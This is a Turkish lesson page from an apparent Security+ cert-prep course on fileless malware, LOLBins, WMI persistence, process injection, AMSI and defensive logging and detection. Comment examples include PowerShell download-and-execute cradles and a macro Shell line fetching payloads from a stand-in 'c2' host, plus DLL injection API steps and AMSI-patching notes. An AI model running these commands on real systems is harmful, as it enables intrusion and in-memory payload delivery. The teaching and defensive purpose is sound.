0Pricing
Cloud & IT Cert Prep · Ders

Dosyasız Kötü Amaçlı Yazılımlar ve Sistemin Kendi Araçlarını Kullanan Saldırılar

Dosyasız kötü amaçlı yazılımların geleneksel imza tabanlı tespitten kaçmak için meşru araçları (PowerShell, WMI, makrolar) nasıl kötüye kullandığını öğrenin.

Dosyasız Kötü Amaçlı Yazılımlar ve Sistemin Kendi Araçlarını Kullanan Saldırılar, CoddyKit'te ücretsiz bir Cloud & IT Cert Prep dersidir. Bu, 4 dersinin 4. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cloud & IT Cert Prep öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cloud & IT Cert Prep kursu toplamda 4 dersten oluşur.

Dosyasız Saldırılar Neden Bu Kadar Etkili

Geleneksel kötü amaçlı yazılımlar çalıştırılabilir dosyaları diske yazar; bu da imza tabanlı antivirüse dosyaları tarayıp algılama fırsatı verir. Dosyasız kötü amaçlı yazılım tamamen bellekte çalışır veya hâlihazırda yüklü olan meşru araçları kötüye kullanır; böylece AV'nin bulabileceği geleneksel kötü amaçlı yazılım dosyaları bırakmaz. Bu durum, imza tabanlı araçların algılama oranlarını önemli ölçüde düşürür. Güvenlik sağlayıcıları, dosyasız kötü amaçlı yazılım saldırılarının dosya tabanlı saldırılara göre başarıya ulaşma olasılığının 10 kat daha fazla olduğunu bildirmektedir. 2016'daki Bangladesh Bank soygunu, 2017'deki Petya/NotPetya varyantları ve sayısız ulus-devlet sızması, kalıcılığı sürdürmek ve algılanmaktan kaçınmak için dosyasız tekniklerden yararlanmıştır.

Sistemin Yerleşik Araçlarından Yararlanma (LotL) Teknikleri

Living-off-the-land (LotL) saldırıları, kötü amaçlı eylemler gerçekleştirmek için kurbanın sisteminde hâlihazırda bulunan meşru araçları ve yardımcı programları kullanır. Bu araçlar — PowerShell, WMI, certutil, mshta, regsvr32, rundll32 — meşru amaçları olduğu için işletim sistemi ve güvenlik yazılımları tarafından güvenilir kabul edilir. Yalnızca yerleşik araçları kullanan bir saldırgan, normal yönetim faaliyetlerinin arasına karışabilir. Savunmacıların karşılaştığı zorluk, bu araçların kötü amaçlı kullanımını meşru yönetim çalışmalarından ayırt etmektir. Bu nedenle davranışsal analiz ve bağlamsal farkındalık, LotL tekniklerinde imza algılamadan daha etkilidir.

# Common LotL (LOLBins - Living Off the Land Binaries):
# certutil.exe   - download files from internet
# mshta.exe      - execute HTA (HTML Application) scripts
# regsvr32.exe   - execute DLL or scriptlets remotely (Squiblydoo)
# rundll32.exe   - execute DLL exports
# wmic.exe       - WMI queries and lateral movement
# bitsadmin.exe  - download/upload via BITS service
# powershell.exe - nearly unlimited capability
# cmstp.exe      - bypass UAC, run scripts

Saldırı Aracı Olarak PowerShell

PowerShell, tam .NET framework'üne, WMI'ye ve Windows API'lerine erişim sağladığı ve bellekte çalıştırıldığında çok az iz bıraktığı için en çok kötüye kullanılan LotL aracıdır. Saldırganlar PowerShell betiklerini diske yazmadan doğrudan belleğe indirir, günlük kaydında görünmelerini zorlaştırmak için komutları Base64 ile kodlar ve .NET derlemelerini belleğe yüklemek için yansıtma gibi özellikleri kullanır. Empire ve Cobalt Strike çerçeveleri, istismar sonrası aşamada büyük ölçüde PowerShell'e dayanır. Savunmalar arasında PowerShell Constrained Language Mode, ScriptBlock Logging (kodu çözülmüş betik içeriğini kaydeder), Module Logging ve Group Policy aracılığıyla PowerShell'i kimlerin çalıştırabileceğini kısıtlama bulunur.

# PowerShell attack example (educational):
# Download and execute payload entirely in memory:
# powershell.exe -NoP -NonI -Exec Bypass -W Hidden -Enc <base64>
# IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1')

# Defense: Enable PowerShell logging (Group Policy):
# Computer Config -> Admin Templates -> Windows Components
# -> Windows PowerShell
# Turn on PowerShell Script Block Logging: Enabled
# Turn on Module Logging: Enabled
# Turn on Transcription: Enabled

Kalıcılık ve Yanal Hareket için WMI

WMI (Windows Management Instrumentation), sistem yönetimi için kullanılan güçlü bir Windows özelliğidir; saldırganlar bunu kalıcılık ve yanal hareket amacıyla kötüye kullanır. Bir WMI olay aboneliği, belirli bir olay gerçekleştiğinde (örneğin her 5 dakikada bir, oturum açıldığında veya belirli bir işlem başlatıldığında) bir komutu tetikler. Bu abonelikler yeniden başlatmalardan sonra da varlığını sürdürür, WMI deposunda saklanır ve geleneksel zamanlanmış görevler veya kayıt defteri çalıştırma anahtarları olarak görünmez — böylece birçok kalıcılık algılama aracından kaçar. Saldırganlar ayrıca ağ paylaşımlarına ihtiyaç duymadan yanal hareketi mümkün kılacak şekilde, DCOM (135 numaralı bağlantı noktası) üzerinden uzak sistemlerde işlem yürütmek için WMI kullanabilir.

# WMI event subscription for persistence (educational):
# Filter: every 5 minutes
# Consumer: execute powershell command
# Binding: connect filter to consumer
#
# Detection:
# Monitor WMI subscriptions:
Get-WMIObject -Namespace root\subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding

# Sysmon Event ID 19/20/21: WMI events logged

İşlem Enjeksiyonu Teknikleri

İşlem enjeksiyonu, kötü amaçlı yazılımın kötü amaçlı kodu meşru ve güvenilir bir işlemin adres alanı içinde çalıştırmasını sağlar (explorer.exe, svchost.exe, notepad.exe). Kötü amaçlı kod, işlemin ayrıcalıklarını ve kimliğini devralır; böylece ağ bağlantıları güvenilir bir uygulamadan geliyormuş gibi görünür. Yaygın enjeksiyon teknikleri arasında DLL enjeksiyonu (kötü amaçlı bir DLL'yi başka bir işleme yükleme), işlem içini boşaltma (askıya alınmış bir işlem oluşturma, kod eşlemesini kaldırma ve yerine kötü amaçlı kod koyma) ve yansıtmalı DLL enjeksiyonu (DLL'yi diske yazmadan doğrudan bellekten yükleme) bulunur. EDR araçları, API çağrısı dizilerini (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) izleyerek enjeksiyonu algılar.

# DLL injection API sequence:
# 1. OpenProcess(PROCESS_ALL_ACCESS, target_pid)
# 2. VirtualAllocEx(target, NULL, dll_path_len, MEM_COMMIT, PAGE_READWRITE)
# 3. WriteProcessMemory(target, alloc_addr, dll_path, dll_path_len)
# 4. CreateRemoteThread(target, NULL, 0, LoadLibraryA, alloc_addr)

# Sysmon rules to detect injection:
# Event ID 8: CreateRemoteThread
# Event ID 10: ProcessAccess (targetted process opened)
# Event ID 25: ProcessTampering (image changed in memory)

Makro Etkin Belgelerin Giriş Noktası Olarak Kullanılması

Birçok dosyasız saldırı zinciri, VBA makroları içeren kötü amaçlı bir Office belgesiyle başlar. Kullanıcı belgeyi açıp makroları etkinleştirdiğinde (çoğu zaman 'Bu belgeyi görüntülemek için İçeriği Etkinleştir' gibi bir mesajla kandırılır), makro, bir yükü doğrudan belleğe indirmek ve çalıştırmak için PowerShell'i çalıştırır. Yük diske hiç yazılmaz — yalnızca özgün Office belgesi diske yazılır. Security+ sınavının makroları devre dışı bırakmayı ve ASR (Attack Surface Reduction) kurallarını dağıtmayı vurgulamasının nedeni budur. Evilginx2 gibi modern saldırgan-aradaki-adam kimlik avı çerçeveleri de kimlik bilgileri ele geçirildikten sonra RAT'leri dağıtmak için kötü amaçlı belgeler iletir.

# Malicious macro flow (educational):
# 1. User receives .docm via email
# 2. User opens, clicks 'Enable Content'
# 3. VBA macro runs:
#    Shell 'powershell -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString(''http://c2/stage2.ps1'')"'
# 4. PowerShell downloads stage2 into memory
# 5. stage2 runs shellcode / loads Cobalt Strike Beacon in memory
# 6. No malware files on disk; only the .docm exists

# ASR rule to block:
# 'Block all Office applications from creating child processes'

AMSI: Kötü Amaçlı Yazılım Tarama Arayüzü

AMSI (Antimalware Scan Interface), uygulamaların (PowerShell, VBScript, JScript, Office) içeriği çalışma zamanında taranmak üzere yüklü antivirüs motoruna göndermesini sağlayan bir Windows API'sidir — içerik diske yazılmadan önce bile. AMSI, AV sağlayıcılarının dosya tabanlı taramada aksi takdirde görünmeyecek betik içeriğini taramasını sağlar. Saldırganlar, tüm gönderimler için 'temiz' sonucu döndürmesi amacıyla bellekteki amsi.dll'yi yamalayarak veya imza eşleştirmesinden kaçmak için betik içeriğini karmaşıklaştırarak AMSI'yi atlatmaya çalışır. EDR araçları, dosyasız saldırı etkinliğinin bir göstergesi olarak AMSI yama girişimlerini izler.

# How AMSI works:
# PowerShell/WScript calls AmsiScanBuffer() before execution
# Windows Defender (or other AV) scans the buffer
# If malicious: AMSI returns AMSI_RESULT_DETECTED -> execution blocked

# AMSI bypass attempts to detect (Sysmon/EDR):
# Memory write to amsi.dll: patch AmsiScanBuffer to always return 0
# Unloading amsi.dll from process memory
# PowerShell Constrained Language Mode + AMSI = stronger defense

Dosyasız Saldırıları Algılama

Dosyasız kötü amaçlı yazılımı algılamak, dosya tabanlı algılamadan davranışsal izlemeye geçmeyi gerektirir. Önemli algılama stratejileri şunlardır: PowerShell ScriptBlock Logging, komut satırında kodlanmış olsa bile kodu çözülmüş betik içeriğini yakalar; Sysmon, tam komut satırlarıyla işlem oluşturmayı, işle ilişkilendirilmiş ağ bağlantılarını ve kayıt defteri değişikliklerini kaydeder; EDR davranış kuralları, şüpheli işlem ilişkilerinde (Word'ün PowerShell'i başlatması, PowerShell'in cmd'yi başlatması, certutil'in çalıştırılabilir dosyaları indirmesi) uyarı verir; Windows Event Forwarding ise ilişkilendirme ve uzun süreli saklama için bu günlükleri merkezi bir SIEM'e gönderir.

# Sysmon detection rules for LotL:
# Event ID 1: Process creation
#   Alert if: Word.exe spawns cmd.exe or powershell.exe
#   Alert if: certutil.exe with -urlcache -f parameters
#   Alert if: mshta.exe with remote URL argument

# Event ID 3: Network connection
#   Alert if: powershell.exe initiates outbound connection
#   Alert if: mshta.exe connects to non-Microsoft IPs

# Event ID 7: Image loaded
#   Alert if: known-bad DLL loaded into legitimate process

LotL Aracı Kullanımını Kısıtlama

Kuruluşlar, güçlü araçları hangi kullanıcıların çalıştırabileceğini kısıtlayarak LotL saldırı yüzeyini azaltabilir. PowerShell Constrained Language Mode, saldırganların dayandığı .NET çağrılarını, COM nesnelerini ve yansıtmayı sınırlar. AppLocker ve WDAC (Windows Defender Application Control), yönetici olmayan kullanıcıların belirli ikili dosyaları çalıştırmasını engelleyebilir. LOLBAS projesi, bilinen LotL ikili dosyalarını saldırı teknikleriyle birlikte kataloglayarak savunmacıların hangi ikili dosyaları izlemesi veya kısıtlaması gerektiğini belirlemesine yardımcı olur. Tüm LotL ikili dosyaları engellenemez (birçoğu işletim sistemi işlevleri için gereklidir), ancak kullanımlarını bağlamıyla birlikte izlemek mümkündür.

# PowerShell Constrained Language Mode:
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
# Or via WDAC policy; CLM automatically applied when WDAC is active

# AppLocker: block mshta.exe for standard users
# Computer Config -> Windows Settings -> Security Settings
# -> Application Control Policies -> AppLocker
# Executable Rules -> Add Rule -> Deny -> mshta.exe (path rule)

# WDAC (stronger than AppLocker):
# Cannot be bypassed by local admin unlike AppLocker
# Enforced at kernel level

Dosyasız Tekniklerin MITRE ATT&CK Kapsamı

MITRE ATT&CK çerçevesi, dosyasız ve LotL tekniklerini kapsamlı biçimde belgeler. Önemli alt teknikler şunlardır: T1059.001 (PowerShell), T1047 (WMI yürütmesi), T1055 (İşlem Enjeksiyonu), T1140 (Dosyaların Gizliliğini Kaldırma/Kodunu Çözme), T1003.001 (kimlik bilgisi dökümü için LSASS Belleği) ve T1546.003 (kalıcılık için WMI Olay Aboneliği). ATT&CK Navigator'ı kullanarak algılama yeteneklerinizi bu tekniklerle eşleştirmek, kapsam boşluklarını ortaya çıkarır ve SIEM kuralı geliştirmeye yön verir. Çerçeve ayrıca her teknik için azaltma ve algılama kılavuzu sunar.

Dosyasız Kötü Amaçlı Yazılımlar için Savunma Özeti

Dosyasız kötü amaçlı yazılımlara karşı katmanlı bir savunma stratejisi şunları içerir: PowerShell logging'i (ScriptBlock, Module, Transcription) etkinleştirmek, kapsamlı bir yapılandırmayla Sysmon dağıtmak, güncel bir AV motoruyla AMSI uygulamak, WDAC aracılığıyla PowerShell Constrained Language Mode'u zorunlu kılmak, Group Policy ile Office belgelerinde makro yürütmeyi kısıtlamak, davranışsal algılama yeteneklerine sahip EDR dağıtmak ve bilinen kötü amaçlı işlem zincirlerine yönelik algılama kuralları içeren bir SIEM'e tüm günlükleri iletmek. Saldırı yüzeyini kısıtlamakla görünürlüğü artırmanın birleşimi, dosyasız saldırıların algılanmadan yürütülmesini önemli ölçüde zorlaştırır.

Hızlı Kontrol

Bu dersteki CompTIA Security+ (SY0-701) kavramlarını anlayıp anlamadığınızı test edin.

Ders Özeti

Bu derste şunları öğrendiniz: dosyasız kötü amaçlı yazılım, imza tabanlı algılamadan kaçmak için bellekte çalışır ve PowerShell, WMI ve certutil gibi meşru işletim sistemi araçlarını kötüye kullanır; işlem enjeksiyonu teknikleri, Windows bellek yönetimi API'lerinden yararlanarak kötü amaçlı kodu güvenilir işlemlerin içine gizler; SIEM, Sysmon ve EDR aracılığıyla gerçekleştirilen davranışsal algılama, PowerShell günlük kaydı ve AMSI ile birleştiğinde imzadan kaçan bu saldırı zincirlerine karşı en güçlü savunmayı sağlar. Sırada güvenlik açığı taraması ile sızma testini karşılaştıracağız.

Sıkça Sorulan Sorular

“Dosyasız Kötü Amaçlı Yazılımlar ve Sistemin Kendi Araçlarını Kullanan Saldırılar” dersi ücretsiz mi?

Evet — “Dosyasız Kötü Amaçlı Yazılımlar ve Sistemin Kendi Araçlarını Kullanan Saldırılar” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cloud & IT Cert Prep kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cloud & IT Cert Prep kursu toplamda 4 dersten oluşur.

“Dosyasız Kötü Amaçlı Yazılımlar ve Sistemin Kendi Araçlarını Kullanan Saldırılar” dersinde ne öğreneceğim?

Dosyasız kötü amaçlı yazılımların geleneksel imza tabanlı tespitten kaçmak için meşru araçları (PowerShell, WMI, makrolar) nasıl kötüye kullandığını öğrenin. Cloud & IT Cert Prep ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cloud & IT Cert Prep öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cloud & IT Cert Prep, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 4. dersidir.

“Dosyasız Kötü Amaçlı Yazılımlar ve Sistemin Kendi Araçlarını Kullanan Saldırılar” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cloud & IT Cert Prep dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cloud & IT Cert Prep dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Virüsler, Solucanlar ve Truva Atları
  2. Fidye Yazılımları ve Şifreleme Zararlıları
  3. Rootkit'ler, Casus Yazılımlar ve Tuş Kaydediciler
  4. Dosyasız Kötü Amaçlı Yazılımlar ve Sistemin Kendi Araçlarını Kullanan Saldırılar
← Cloud & IT Cert Prep Sayfasına Dön